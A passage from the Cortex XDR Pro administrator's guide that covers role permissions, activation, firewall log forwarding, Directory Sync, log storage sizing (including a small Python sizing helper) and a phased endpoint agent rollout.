  • JP—All Cortex XDR logs and data remain within the Japan boundary.
  • CA—All Cortex XDR logs and data remain within the Canada boundary. However, if you have a WildFire
  Canada cloud subscription, consider the following:
    • You cannot send file submissions for bare-metal analysis.
    • You will not be protected against macOS-borne zero-day threats. However, you will receive
    protections against other macOS malware in regular WildFire updates.
    • You will not be able to see file submissions in AutoFocus.
  • AU—All Cortex XDR logs and data remain within the Australia boundary except WildFire file
  submissions, which Cortex XDR sends to the WildFire Singapore Cloud for analysis.
• (Cortex XDR Pro per Endpoint license only) Calculate the bandwidth required to support the number of
agents you plan to deploy. You need 1.2Mbps of bandwidth for every 1,000 agents. The bandwidth
requirement scales linearly, so, for example, to support 100,000 agents you need to allocate 120Mbps of
bandwidth.
• Manage Roles to ensure you or the person who is activating Cortex apps has the appropriate permissions.
• When you are ready to get started with a new tenant, Activate Cortex XDR.

Manage Roles
Role-based access control (RBAC) enables you to use roles or specific permissions to assign access rights to
administrative users. You can manage roles for all Cortex apps and services in the hub. By assigning roles,
you enforce the separation of viewing access and initiating actions among functional or regional areas of
your organization. The following options are available to help you manage access rights:
• Assign Predefined User Roles for Cortex XDR
• Create and save new roles based on granular permissions
• Edit role permissions (available for roles you create)
• Assign permissions to users without saving a role
Use roles to assign specific view and action access privileges to administrative user accounts. The way you
configure administrative access depends on the security requirements of your organization. The built-in
roles provide specific access rights that cannot be changed. The roles you create provide more granular
access control.
When your organization purchases Cortex XDR, the Account Administrator can use the Palo Alto Networks
hub to assign roles to other members that have accounts in the Customer Support Portal.
To activate Cortex XDR apps, you must be assigned either the Account Administrator or App Administrator
role for Cortex XDR. If you are activating a new Cortex Data Lake instance, you must also be assigned either
of these administrative roles for Cortex Data Lake.
After activation, Account Administrators can assign additional users roles to manage your apps. If the user
only needs to manage a specific instance of an app, you can assign the Instance Administrator role.
To assign the roles, Account Administrators (or users that are assigned the App Administrator for the
relevant app) can take the following steps:

STEP 1 | If necessary, add a new Customer Support Portal user.


To be eligible for role assignment in the hub, the user must have an account in the Customer Support
Portal (https://support.paloaltonetworks.com/) and be assigned any of the following Customer Support
Portal roles: Super User, Standard User, or Limited User. Skip this step if the user already has a Customer
Support Portal account with an appropriate role.

STEP 2 | Manage the level of access for a Cortex XDR user.
1. Log in to the hub and select > Access Management.
2. Use the sidebar to filter users as needed, or use the search field to search for users.
3. Select one or more users and then Assign Roles.

4. In the Assign Roles page for each instance, select one of the following options:
• Assign Permissions—Create a new role or assign selected permissions.
• Cortex XDR Predefined Role—Select one of the predefined Cortex XDR roles. Select Role
Definitions to view a list of the Cortex predefined roles and the allocated views and actions.
• No Role—User is not assigned any view or action access to the Cortex XDR app.

5. (Optional) To create a new role:
1. After you select Assign Permissions, in the Assign Custom Permissions pop-up, select which
IN_APP VIEWS and IN_APP ACTIONS permissions you want to grant.
2. Save As New Role to create a new role that you can apply to other users, or Save to apply the
selected permissions to the user without a defined role.

The new role is displayed with the User Created (UC) icon. Select the role to apply its permissions to the
user and then Save.

6. (Optional) To edit or clone a user-created role:
1. Select > Access Management > Manage Roles.
2. In the Manage Roles Cortex XDR page, find your user-created role and select Actions.
3. Edit Permissions, Clone, or Delete your role, as desired.

Predefined User Roles for Cortex XDR
Role-based access control (RBAC) enables you to use preconfigured roles to assign access rights to
administrative users. You can manage roles for all Cortex apps and services in the hub. By assigning roles,
you enforce the separation of access among functional or regional areas of your organization.
Each role extends specific privileges to users. The way you configure administrative access depends on the
security requirements of your organization. Use roles to assign specific access privileges to administrative
user accounts. The built-in roles provide specific access rights that cannot be changed. Use hub roles to
provide full access to Cortex XDR with three levels: Account, App, or Instance. If you need more granular
access control, you can assign any of the Cortex XDR app roles.
The following table describes the Cortex XDR predefined roles and the view and action privileges
associated with each.

Some features are license dependent. As a result, users may not see a specific feature if
the feature is not supported by the license type or if they do not have access based on their
assigned role.

Role View Privileges Action Privileges

App Administrator • Endpoints • Configurations


The user has full access to • Endpoint Profiles • Public API
the given apps, including • Global Exceptions • Alert Notifications
all current and future app • Endpoint Policies • Threat Intelligence
instances. App Administrator • Endpoint Management • General Configuration
can assign roles for app
• Endpoint Installations • On-demand Analytics
instances, and can also
activate app instances • Device Control • External Alerts Mapping
specific to that app. • Vulnerability Assessment • EDL Configuration
• Host Insights • SaaS Log Collection

32 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Role View Privileges Action Privileges
Requires a Cortex XDR • Investigation • Broker Service
license. • Investigation
• Rules
• Incidents • Incidents
• Alerts • Alerts
• Response • Rules
• Action Center • Assets
• Scripts • Network Configuration
• Configurations • Response
• Public API • File Search
• Auditing • Destroy Files
• Alert Notifications • Remediation
• Threat Intelligence • Quarantine
• On-demand Analytics • Request WildFire Verdict
• External Alerts Mapping Change
• EDL Configuration • Block list
• SaaS Log Collection • Terminate Process
• Pathfinder Applet • Isolate
• Pathfinder Data Collection • Live Terminal
• Ingestion Monitoring • EDL
• Assets • Run Standard Script
• Run High-Risk Script
• Asset Management
• Script Configurations
• File Retrieval
• Endpoints
• Retrieve Endpoint Data
• Endpoint Scan
• Endpoint Profiles
• Global Exceptions
• Endpoint Policies
• Endpoint Management
• Endpoint Installations
• Device Control
• Vulnerability Assessment
• Host Insights
• Change Managing Server
• Broker VM
• Manage
• Pathfinder Applet
• Pathfinder Data
Collection

Instance Administrator • Endpoints • Configurations


The user has full access • Endpoint Profiles • Public API
to the app instance. The • Global Exceptions • Alert Notifications
Instance Administrator can • Endpoint Policies • Threat Intelligence
make other users Instance

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro 33
© 2020 Palo Alto Networks, Inc.
Role View Privileges Action Privileges
Administrator for the app • Endpoint Management • General Configuration
instance. If the app has • Endpoint Installations • On-demand Analytics
predefined or custom roles, • Device Control • External Alerts Mapping
the Instance Administrator • Vulnerability Assessment • EDL Configuration
can assign those roles to
• Host Insights • SaaS Log Collection
other users.
• Investigation • Broker Service
• Rules • Investigation
• Incidents • Incidents
• Alerts • Alerts
• Response • Rules
• Action Center • Assets
• Scripts • Network Configuration
• Configurations • Response
• Public API • File Search
• Auditing • Destroy Files
• Alert Notifications • Remediation
• Threat Intelligence • Quarantine
• General Configuration • Request WildFire Verdict
• On-demand Analytics Change
• External Alerts Mapping • Block List
• Broker Services • Terminate Process
• Pathfinder AppletPathfinder • Isolate
Data Collection • Live Terminal
• Ingestion Monitoring • EDL
• Assets • Run Standard Script
• Asset Management • Run High-Risk Script
• Script Configurations
• File Retrieval
• Endpoints
• Retrieve Endpoint Data
• Endpoint Scan
• Endpoint Profiles
• Global Exceptions
• Endpoint Policies
• Endpoint Management
• Endpoint Installations
• Device Control
• Vulnerability Assessment
• Host Insights
• Change Managing Server
• Broker VM
• Manage
• Pathfinder Applet
• Pathfinder Data
Collection

34 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Get Started with Cortex XDR Pro
© 2020 Palo Alto Networks, Inc.
Role View Privileges Action Privileges

Viewer • Endpoints —
Can view the majority of the • Endpoint Profiles
features of the Cortex XDR • Global Exceptions
app for this instance, but can • Endpoint Policies
take no actions. • Endpoint Management
Requires a Cortex XDR • Endpoint Installations
license. • Device Control
• Vulnerability Assessment
• Host Insights
• Investigation
• Rules
• Incidents
• Alerts
• Response
• Action Center
• Scripts
• Configurations
• Auditing
• General Configuration
• Pathfinder Applet
• Pathfinder Data Collection
• Assets
• Asset Management

Security Admin
Can triage and investigate alerts and incidents, respond (excluding Live Terminal), and edit profiles and policies. Requires a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.
View Privileges: Endpoints, Endpoint Profiles, Global Exceptions, Endpoint Policies, Endpoint Management, Endpoint Installations, Device Control, Vulnerability Assessment, Host Insights, Investigation, Rules, Incidents, Alerts, Response, Action Center, Scripts, Configurations, General Configuration, EDL Configuration, SaaS Log Collection, Assets, Asset Management
Action Privileges: Configurations, General Configuration, EDL Configuration, SaaS Log Collection, Investigation, Rules, Incidents, Alerts, Response, Quarantine, Request WildFire Verdict Change, Block List, Terminate Process, Isolate, EDL, Endpoints, Retrieve Endpoint Data, Endpoint Scan, Endpoint Profiles, Endpoint Policies, Vulnerability Assessment, Host Insights
Privileged Security Admin
Can triage and investigate alerts and incidents, respond, and edit profiles and policies. Requires a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.
View Privileges: Endpoints, Endpoint Profiles, Global Exceptions, Endpoint Policies, Endpoint Management, Endpoint Installations, Device Control, Vulnerability Assessment, Host Insights, Investigation, Rules, Incidents, Alerts, Response, Action Center, Scripts, Configurations, Auditing, Alert Notifications, Threat Intelligence, General Configuration, On-demand Analytics, EDL Configuration, SaaS Log Collection, Broker Service
Action Privileges: Configurations, Alert Notifications, Threat Intelligence, General Configuration, On-demand Analytics, EDL Configuration, SaaS Log Collection, Broker Service, Investigation, Rules, Incidents, Alerts, Assets, Network Configuration, Response, File Search, Destroy Files, Remediation, Quarantine, Request WildFire Verdict Change, Block List, Terminate Process, Isolate, Live Terminal, EDL, Run Standard Script, Run High-Risk Script, Script Configurations, File Retrieval, Endpoints, Retrieve Endpoint Data, Endpoint Scan, Endpoint Profiles, Endpoint Policies, Device Control, Vulnerability Assessment, Host Insights
IT Admin
Can manage and control endpoints and installations, configure brokers, and view profiles, policies, and alerts. Requires a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.
View Privileges: Endpoints, Endpoint Profiles, Global Exceptions, Endpoint Policies, Endpoint Management, Endpoint Installations, Device Control, Vulnerability Assessment, Host Insights, Investigation, Incidents, Alerts, Response, Action Center, Configurations, SaaS Log Collection, Broker Service, Pathfinder Applet, Pathfinder Data Collection, Ingestion Monitoring, Assets, Asset Management
Action Privileges: Configurations, General Configuration, SaaS Log Collection, Broker Service, Endpoints, Retrieve Endpoint Data, Global Exceptions, Endpoint Management, Endpoint Installations, Vulnerability Assessment, Host Insights, Broker VM, Pathfinder Applet, Pathfinder Data Collection
Privileged IT Admin
Can manage and control endpoints and installations, configure brokers, create profiles and policies, view alerts, and initiate Live Terminal. Requires a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.
View Privileges: Endpoints, Endpoint Profiles, Endpoint Policies, Endpoint Management, Endpoint Installations, Device Control, Vulnerability Assessment, Host Insights, Investigation, Incidents, Alerts, Response, Action Center, Scripts, Configurations, General Configuration, SaaS Log Collection, Broker Service, Pathfinder Applet, Pathfinder Data Collection, Ingestion Monitoring, Assets, Asset Management
Action Privileges: Configurations, General Configuration, SaaS Log Collection, Broker Service, Investigation, Incidents, Alerts, Assets, Network Configuration, Response, File Search, Destroy Files, Remediation, Request WildFire Verdict Change, Live Terminal, Run Standard Script, Run High-Risk Script, Script Configurations, File Retrieval, Endpoints, Retrieve Endpoint Data, Global Exceptions, Endpoint Management, Endpoint Installations, Device Control, Vulnerability Assessment, Host Insights, Broker VM, Pathfinder Applet, Pathfinder Data Collection
Deployment Admin
Can manage and control endpoints and installations, and configure brokers. Requires a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.
View Privileges: Endpoints, Global Exceptions, Endpoint Management, Endpoint Installations, Configurations, Auditing, Broker Services, Broker Service, Pathfinder Applet, Pathfinder Data Collection, Assets, Asset Management
Action Privileges: Configurations, Broker Service, Endpoints, Endpoint Management, Endpoint Installations, Change Managing Server, Broker VM, Pathfinder Applet, Pathfinder Data Collection
Investigation Admin
Can view and triage alerts and incidents, configure rules, and view the profiles and policies and analytics management screens. Requires a Cortex XDR license.
View Privileges: Endpoints, Endpoint Profiles, Endpoint Policies, Device Control, Vulnerability Assessment, Host Insights, Investigation, Rules, Incidents, Alerts, Response, Action Center, Configurations, EDL Configuration
Action Privileges: Configurations, EDL Configuration, Investigation, Rules, Incidents, Alerts, Response, EDL, Endpoints, Endpoint Scan, Device Control, Vulnerability Assessment, Host Insights
Investigator
Can view and triage alerts and incidents. Requires a Cortex XDR license.
View Privileges: Investigation, Incidents, Alerts
Action Privileges: Investigation, Incidents, Alerts, Endpoints, Retrieve Endpoint Data, Endpoint Scan
Privileged Investigator
Can view and triage alerts, incidents and rules, profiles and policies, and analytics management screens. Requires a Cortex XDR Pro per Endpoint license.
View Privileges: Endpoints, Endpoint Profiles, Endpoint Policies, Device Control, Vulnerability Assessment, Host Insights, Investigation, Rules, Incidents, Alerts, Response, Action Center, Configurations, EDL Configuration, Assets, Asset Management
Action Privileges: Configurations, EDL Configuration, Investigation, Incidents, Alerts, Assets, Network Configuration, Response, EDL, Endpoints, Endpoint Scan, Device Control, Vulnerability Assessment, Host Insights
Responder
Can view and triage alerts, and access all response capabilities excluding Live Terminal. Requires a Cortex XDR Prevent or Cortex XDR Pro per Endpoint license.
View Privileges: Investigation, Rules, Incidents, Alerts, Response, Action Center
Action Privileges: Response, Quarantine, Request WildFire Verdict Change, Block List, Terminate Process, Isolate, EDL, Endpoints, Retrieve Endpoint Data, Endpoint Scan
Privileged Responder
Can view and triage alerts and incidents, access all response capabilities, and configure rules, policies, and profiles. Requires a Cortex XDR license.
View Privileges: Endpoints, Endpoint Profiles, Endpoint Policies, Endpoint Management, Device Control, Vulnerability Assessment, Host Insights, Investigation, Rules, Incidents, Alerts, Response, Action Center, Scripts, Configurations, General Configuration, EDL Configuration, Pathfinder Applet, Pathfinder Data Collection, Assets, Asset Management
Action Privileges: Configurations, General Configuration, EDL Configuration, Investigation, Rules, Incidents, Alerts, Assets, Network Configuration, Response, File Search, Destroy Files, Remediation, Quarantine, Request WildFire Verdict Change, Block List, Terminate Process, Isolate, Live Terminal, EDL, Run Standard Script, Run High-Risk Script, Script Configurations, File Retrieval, Endpoints, Retrieve Endpoint Data, Endpoint Scan, Device Control, Vulnerability Assessment, Host Insights
Activate your Network Devices
With a Cortex XDR Pro per TB license, if you use Palo Alto Networks firewalls as a traffic log source, you
must activate your firewalls and Panorama and configure them for log forwarding to Cortex Data Lake.

STEP 1 | Register and activate your firewalls and Panorama.

STEP 2 | Onboard Panorama-Managed Firewalls to Cortex Data Lake.

STEP 3 | Upgrade firewalls and Panorama to the latest software and content releases.
PAN-OS 8.0.6 is the minimum required software release version for Palo Alto Networks firewalls and
Panorama. However, to enable Cortex XDR to leverage the Directory Sync Service and Enhanced
Application Logs, upgrade firewalls and Panorama to PAN-OS 8.1.1 or later and to the latest content
release:
• Get the latest application and threat content updates.
• Upgrade to PAN-OS 8.1.1.

STEP 4 | Ensure that firewalls have visibility into internal traffic and applications.
It’s important that at least one firewall sending logs to the Cortex Data Lake is processing or has visibility
into internal traffic and applications.
If you have deployed only internet gateway firewalls, one option might be to configure a tap interface to
give a firewall visibility into data center traffic even though the firewall is not in the traffic flow. Connect
the tap mode interface to a data center switch SPAN or mirror port that provides the firewall with the
mirrored traffic, and make sure that the firewall is enabled to log the traffic and send it to the Cortex
Data Lake.
Because data center firewalls already have visibility into internal network traffic, you don’t need to
configure these firewalls in tap mode; however, contact Palo Alto Networks Professional Services for
best practices to ensure that the Cortex Data Lake and Cortex XDR-required configuration updates do
not affect data center firewall deployments.

STEP 5 | Configure firewalls to forward Cortex XDR-required logs to Cortex Data Lake.
The Cortex Data Lake provides centralized, cloud-based log storage for firewalls, and Panorama provides
an interface you can use to view the stored logs. The rich log data that firewalls forward to the Cortex
Data Lake provides the Cortex XDR analytics engine the network visibility it requires to perform data
analytics.
To support Cortex XDR, firewalls must forward at least Traffic logs to the Cortex Data Lake. The
complete set of log types that a firewall should forward to the Cortex Data Lake are:
• Traffic (required)
• Threat (spyware, anti-exploit, anti-malware, DNS Security, etc.)
• URL Filtering
• User-ID
• HIP
• Enhanced application logs (PAN-OS 8.1.1 or later)
Enhanced application logs are designed to increase visibility into network activity for Palo Alto Networks
Cloud Services apps, and Cortex XDR requires these logs to support certain features.
Follow the complete workflow to configure Panorama-managed firewalls to forward logs to the Cortex
Data Lake.

Activate Cortex XDR
Use the hub (https://apps.paloaltonetworks.com) to activate Cortex XDR. This is a one-time task you’ll
need to perform when you first start using Cortex XDR. After you’ve activated the Cortex XDR app—and
completed all the steps described in Set up Cortex XDR Pro Overview—you’ll only need to repeat the
activation if you want to add additional app instances.
To activate the Cortex XDR app, you must be assigned a required role and locate your activation email
containing a link to begin activation in the hub. Activating Cortex XDR automatically includes activation of
Cortex Data Lake.

STEP 1 | Begin activation.


1. Click the activation link you received in email to begin activation in the hub.
2. If you manage multiple company CSP accounts, make sure you select the specific account to which
you want to allocate the Cortex XDR license before proceeding with activation.

The hub will associate activation of Cortex XDR and the included apps and services
only with the selected account.
3. From the Cortex XDR tile, select the serial number you want to activate.
If there is only one serial number associated with your company account, you can click the tile to
begin activation.

If you have multiple serial numbers associated, click each one to activate.

STEP 2 | Provide details about the Cortex XDR app you’re activating.

• Company Account—Identifies the company account under which you are activating Cortex XDR.
• Name—Give your Cortex XDR app instance an easily-recognizable name and optional Description.
If you have more than one Cortex XDR instance, the hub displays the name in the instance list when
you select the Cortex XDR tile. Choose a name that is 59 or fewer characters and is unique across
your company account.
• Subdomain—Give your Cortex XDR instance an easy to recognize name. The hub displays the name
you assign on the list of available instances for the Cortex XDR app. You can also access the Cortex
XDR app directly using the full URL (https://<subdomain>.xdr.<region>.paloaltonetworks.com). If
you are converting an existing Traps management service to Cortex XDR, this field is grayed out.
• Cortex Data Lake—Select the Cortex Data Lake instance that will provide the Cortex XDR apps with
log data.
If you activated with an auth code, provision a new Cortex Data Lake instance by selecting the link
to activate purchased licenses and provide the separate Cortex Data Lake auth code you received in
email.
If you activated with the activation link, you can automatically provision a new Cortex Data Lake
instance in the region you select or select an existing Cortex Data Lake and increase its size.

You can only select a Cortex Data Lake instance that is not allocated to another
Cortex XDR instance. When you select a Cortex Data Lake instance, the hub
provisions your Cortex XDR instance in the same region.

• Region—Select a region in which you want to set up your Cortex Data Lake instance. If you selected
an existing Cortex Data Lake instance, this field automatically displays the region in which your
Cortex Data Lake instance is deployed and cannot be changed.
• Directory Sync—(Optional) Select the Directory Sync Service instance that will provide the Cortex
XDR app with Active Directory data. If there is only one Directory Sync Service instance for the
selected Cortex Data Lake region, the hub automatically selects it for pairing with the Cortex XDR
app; however, you can clear the default selection if desired. If you do not currently have a Directory
Sync Service activated and configured for your account, you can select the link to create an instance
now, or you can add one at a later time.

STEP 3 | Review the end user license agreement and Agree & Activate.
The hub displays the activation status as it activates and provisions your apps. It can take up to an hour
to complete activation. After activation completes, the hub displays a summary that shows the details for
your apps and services.

STEP 4 | Manage Apps to view the current status of your apps.


When the app is available you will see a green check mark in the STATUS column. To return to the
status page at a later time, return to the hub and select the gear icon > Manage Apps.

STEP 5 | When your app is available, log in to your Cortex XDR app to confirm that you can successfully
access the Cortex XDR app interface.

STEP 6 | Allocate Log Storage for Cortex XDR.


Review the storage allocation for your Cortex Data Lake and adjust the quota as needed. You must be
assigned an Instance Administrator or higher role for Cortex Data Lake to manage logging storage.

STEP 7 | Assign roles to additional administrators, if needed.

STEP 8 | Complete your configuration.


If you have a Cortex XDR Pro per Endpoint license, continue to Set up Endpoint Protection. Otherwise
proceed to Set up Network Analysis.

Set Up Directory Sync
Directory Sync is an optional service that enables you to leverage Active Directory user, group, and
computer information in Cortex XDR apps to provide context when you investigate alerts. You can use
Active Directory information in policy configuration and endpoint management.
After you finish the setup, Cortex XDR automatically updates when the DSS agent updates.
To set up Directory Sync:

STEP 1 | Add and configure your Directory Sync instance.


See the Directory Sync Service Getting Started Guide for instructions.

STEP 2 | Pair the Directory Sync to Cortex XDR apps.


Pairing can occur during Cortex XDR activation or after you activate Cortex XDR apps.

STEP 3 | After you activate and pair Cortex XDR apps with Directory Sync, you must define which
Active Directory domain the analytics engine should use.

Wait about ten minutes after you have paired Directory Sync before you do this.

Pairing Directory Sync


If you did not pair Directory Sync to your Cortex apps during Cortex XDR activation, you can later pair it
with your Cortex XDR instance.

STEP 1 | Log into the hub.

STEP 2 | Click the gear > Manage Apps in the upper-right corner.

STEP 3 | Locate the Directory Sync instance that you want to use with Cortex XDR. Make a note of the
instance's name, which appears in the left-most column.
If you have more than one instance, make sure you choose the instance that is in the same region as the
Cortex Data Lake instance you are using with your apps.

STEP 4 | Pair the Directory Sync instance with your Cortex XDR instance.
1. Scroll down until you find your Cortex XDR instance in the Cortex XDR section.
2. Click on its name in the left-most column.

3. In the resulting pop-up configuration screen, select the desired Directory Sync instance, and then
click OK.

Allocate Log Storage for Cortex XDR
You receive Cortex Data Lake log storage based on the amount of storage associated with your Cortex XDR
Licenses. Generally, this capacity is determined by factors such as the size of your network and number of
endpoints in your deployment.
Cortex XDR Pro per Endpoint and Cortex XDR Pro per TB licenses grant a daily ingestion quota equal to the
licensed number of TB divided by 30, in addition to the same number of TB in storage.
For example, with a Cortex XDR Pro per TB 10 license:
• Daily ingestion quota is calculated as 10TB / 30 = 333GB
• Storage = 10TB
To increase your capacity, contact your Palo Alto Networks account representative.
When you activate Cortex XDR, Cortex Data Lake assigns a default storage allocation for your logs, EDR
data, and alerts. While some Cortex apps receive a default allocation, with a Cortex XDR Pro per TB license,
you must manually allocate storage for firewall logs. After you activate Cortex XDR, review and adjust your
log storage allocation depending on your storage requirements.

Cortex Data Lake displays the current possible allocation but does not display the storage
usage.

To allocate your log storage quota:

STEP 1 | Sign In to the Palo Alto Networks hub at https://apps.paloaltonetworks.com/.

STEP 2 | Select your Cortex Data Lake instance.


If you have multiple Cortex Data Lake instances, select the Cortex Data Lake tile and then select the
Cortex Data Lake instance from the list of available instances associated with your account.
Cortex Data Lake displays the service status and your total logging storage capacity.

STEP 3 | Select Configuration to define logging storage settings.


Cortex Data Lake displays the total storage allocated for the apps and services associated with the
Cortex Data Lake instance.
The Cortex Data Lake depicts your storage allocation graphically. As you adjust your storage allocation,
the graphic updates to display the changes to your storage policy. The Cortex Data Lake storage
policy specifies the distribution of your total storage allocated to each app or service and the minimum
retention warning (not supported with Cortex XDR).

STEP 4 | Allocate quota for Cortex XDR.


1. If you purchased quota for firewall logs, allocate quota to the Firewall log type.
To use the same Cortex Data Lake instance for both firewall logs and Cortex XDR logs, you must first
associate Panorama with the Cortex Data Lake instance before you can allocate quota for firewall
logs.
2. Review your storage allocation for Cortex XDR according to the formula:
1TB for every 200 Cortex XDR Pro endpoints for 30 days
By default, 80% of your available storage for Cortex XDR is assigned to logs and data, and 20%
is assigned to alerts. It is recommended to use the default allocations as a starting point, review
the status of your Cortex Data Lake instance after about two weeks of data collection, and make
adjustments as needed.
Use the Cortex Data Lake Calculator to calculate how many logs are ingested and add additional TBs
accordingly.

STEP 5 | Apply your changes.

STEP 6 | Monitor your data retention.


Cortex XDR retains your endpoint data according to the allocated quota in Cortex XDR Data Lake. Make
sure your data retention is sufficient for your environment.

By default, Cortex XDR does not remove data that is less than 30 days old; however, you must
allocate the quota in order for Cortex XDR to support that retention.

1. From Cortex XDR, navigate to the gear icon > Cortex XDR License.
2. In the Endpoint XDR Data Retention section, review the following:
• Current number of days your data has been stored in Cortex XDR Data Lake. The count begins
as soon as you activate Cortex XDR.
• Number of retention days permitted according to the quota you allocated.
3. If needed, update your Cortex XDR allocated quota.
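The sizing figures in this section (licensed TB / 30 per day, 1 TB per 200 endpoints for 30 days, and the default 80/20 split between logs and alerts) worked into a small planning helper. This is an added example written for this section, not Palo Alto Networks code and not the Cortex Data Lake Calculator; it uses 1 TB = 1000 GB to match the guide's 10 TB / 30 = 333 GB arithmetic, and the function names and the "shortfall" output are this example's own.

```python
"""Cortex Data Lake sizing helper built from the figures in this guide.
Added example (not Palo Alto Networks code); every constant comes from the text above."""

DAYS_PER_MONTH = 30        # the guide divides the licensed TB by 30 to get the daily quota
GB_PER_TB = 1000           # matches the guide's arithmetic: 10 TB / 30 = 333 GB
ENDPOINTS_PER_TB = 200     # "1TB for every 200 Cortex XDR Pro endpoints for 30 days"
LOGS_SHARE = 0.80          # default split: 80% logs and data ...
ALERTS_SHARE = 0.20        # ... and 20% alerts


def per_tb_license(licensed_tb: float) -> dict:
    """Daily ingestion quota (GB) and storage (TB) granted by a Pro per TB license."""
    return {
        "daily_ingestion_gb": licensed_tb * GB_PER_TB / DAYS_PER_MONTH,
        "storage_tb": float(licensed_tb),
    }


def endpoint_storage_tb(endpoints: int, retention_days: int = 30) -> float:
    """Storage (TB) needed to keep data for `endpoints` agents for `retention_days` days."""
    return endpoints / ENDPOINTS_PER_TB * retention_days / DAYS_PER_MONTH


def retention_days(endpoints: int, allocated_tb: float) -> float:
    """Days of endpoint data an allocation supports (inverse of endpoint_storage_tb)."""
    if endpoints <= 0:
        raise ValueError("endpoints must be positive")
    return allocated_tb * ENDPOINTS_PER_TB * DAYS_PER_MONTH / endpoints


def default_split(allocated_tb: float) -> dict:
    """How Cortex Data Lake divides a Cortex XDR allocation by default."""
    return {
        "logs_and_data_tb": allocated_tb * LOGS_SHARE,
        "alerts_tb": allocated_tb * ALERTS_SHARE,
    }


def plan(endpoints: int, allocated_tb: float, min_days: int = 30) -> dict:
    """Check an allocation against the 30-day retention the guide expects and
    report how much more quota (if any) is needed to reach it."""
    days = retention_days(endpoints, allocated_tb)
    needed = endpoint_storage_tb(endpoints, min_days)
    return {
        "retention_days": days,
        "meets_minimum": days >= min_days,
        "shortfall_tb": max(0.0, needed - allocated_tb),
        **default_split(allocated_tb),
    }


if __name__ == "__main__":
    print(per_tb_license(10))                     # the guide's 10 TB example
    print(plan(endpoints=1000, allocated_tb=4.0))  # 1000 agents on 4 TB: 24 days, 1 TB short
```

Run it after activation with your real endpoint count and the quota shown under Cortex Data Lake > Configuration; a `shortfall_tb` above zero means the allocation cannot hold 30 days of endpoint data, which is the case to catch before the Endpoint XDR Data Retention page starts reporting fewer permitted days than you expect.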

Set up Endpoint Protection
The Cortex XDR agent monitors endpoint activity and collects endpoint data that Cortex XDR uses to
raise alerts. Before you can begin collecting endpoint data, you must deploy the Cortex XDR agent and
configure endpoint policy. To use endpoint management functions in Cortex XDR you must be assigned an
administrative role in the hub.

STEP 1 | Verify the status of your Cortex XDR tenant.


1. From the hub, click the gear icon next to your name.
2. In the Cortex area, review the STATUS for the tenant you just activated.
When the Cortex XDR tenant is available, the status changes to a green check mark.

STEP 2 | Plan Your Agent Deployment.

STEP 3 | Enable Access to Cortex XDR.

STEP 4 | (Optional) Set up Broker VM communication.

STEP 5 | Install the Cortex XDR agent on your endpoints.


Install the agent software directly on an endpoint or use a software deployment tool of your choice
(such as JAMF or GPO) to distribute and install the software on multiple endpoints.
1. Create an Agent Installation Package.
2. Install the Cortex XDR agent.
For instructions by operating system, see the Cortex XDR Agent Administrator’s Guide or the Traps
Agent Administrator’s Guide if you use an earlier version.

STEP 6 | Define Endpoint Groups to which you can apply endpoint security policy.

STEP 7 | Customize your Endpoint Security Profiles and assign them to your endpoints.
Cortex XDR provides out-of-the box exploit and malware protection. However, at minimum, you must
enable Data Collection in an Agent Settings profile to leverage endpoint data in Cortex XDR apps. Data
collection for Windows endpoints is available with Traps 6.0 and later releases and on endpoints running
Windows 7 SP1 and later releases. Data collection on macOS and Linux endpoints is available with
Traps 6.1 and later releases.

STEP 8 | (Optional) Configure Device Control profiles to restrict file execution on USB-connected
devices.

STEP 9 | Verify that the Cortex XDR agent can connect to your Cortex XDR instance.
If successful, the Cortex XDR console displays a Connected status. You can view the status of all agents
on the Endpoints > Endpoint Management page of your Cortex XDR management console.

STEP 10 | Configure the internal networks that you want Cortex XDR to monitor.
1. From the Cortex XDR management console, navigate to Assets > Network Configuration > IP
Address Ranges.
2. Define your IP Address Ranges.
This page provides a table of the IP address ranges Cortex XDR Analytics monitors, which is pre-
populated with the default IPv4 and IPv6 address spaces.

3. Define your Domain Names.

STEP 11 | If you also have a Cortex XDR Pro per TB license, proceed to Set up Network Analysis.
Otherwise, proceed to Configure Cortex XDR.

Plan Your Agent Deployment


You typically deploy Cortex XDR agent software to endpoints across a network after an initial proof of
concept (POC), which simulates your corporate production environment. During the POC or deployment
stage, you analyze security events to determine which are triggered by malicious activity and which are due
to legitimate processes behaving in a risky or incorrect manner. You also simulate the number and types of
endpoints, the user profiles, and the types of applications that run on the endpoints in your organization
and, according to these factors, you define, test, and adjust the security policy for your organization.
The goal of this multi-step process is to provide maximum protection to the organization without interfering
with legitimate workflows.
After the successful completion of the initial POC, we recommend a multi-step implementation in the
corporate production environment for the following reasons:
• The POC doesn't always reflect all the variables that exist in your production environment.
• In rare cases, the Cortex XDR agent can affect business applications, because a vulnerability in the
application's own software can surface as a prevented attack.
• During the POC, it is much easier to isolate issues that appear and provide a solution before full
implementation in a large environment where issues could affect a large number of users.
A multi-step deployment approach ensures a smooth implementation and deployment of the Cortex XDR
solution throughout your network. Use the following steps for better support and control over the added
protection.

Step Duration Plan

0. Calculate the bandwidth required to support the number of agents you plan to deploy.
Duration: as needed
Plan: For every 100,000 agents, you will need to allocate 120Mbps of bandwidth. The bandwidth
requirement scales linearly. For example, to support 300,000 agents, plan to allocate 360Mbps of
bandwidth (three times the amount required for 100,000 agents).

1. Install Cortex XDR on endpoints.
Duration: 1 week
Plan: Install the Cortex XDR agent on a small number of endpoints (3 to 10). Test normal behavior of the
Cortex XDR agents (injection and policy) and confirm that there is no change in the user experience.

2. Expand the Cortex XDR deployment.
Duration: 2 weeks
Plan: Gradually expand agent distribution to larger groups that have similar attributes (hardware,
software, and users). At the end of two weeks you can have Cortex XDR deployed on up to 100 endpoints.

3. Complete the Cortex XDR installation.
Duration: 2 or more weeks
Plan: Broadly distribute the Cortex XDR agent throughout the organization until all endpoints are
protected.

4. Define corporate policy and protected processes.
Duration: Up to 1 week
Plan: Add protection rules for third-party or in-house applications and then test them.

5. Refine corporate policy and protected processes.
Duration: Up to 1 week
Plan: Deploy security policy rules to a small number of endpoints that use the applications frequently.
Fine tune the policy as needed.

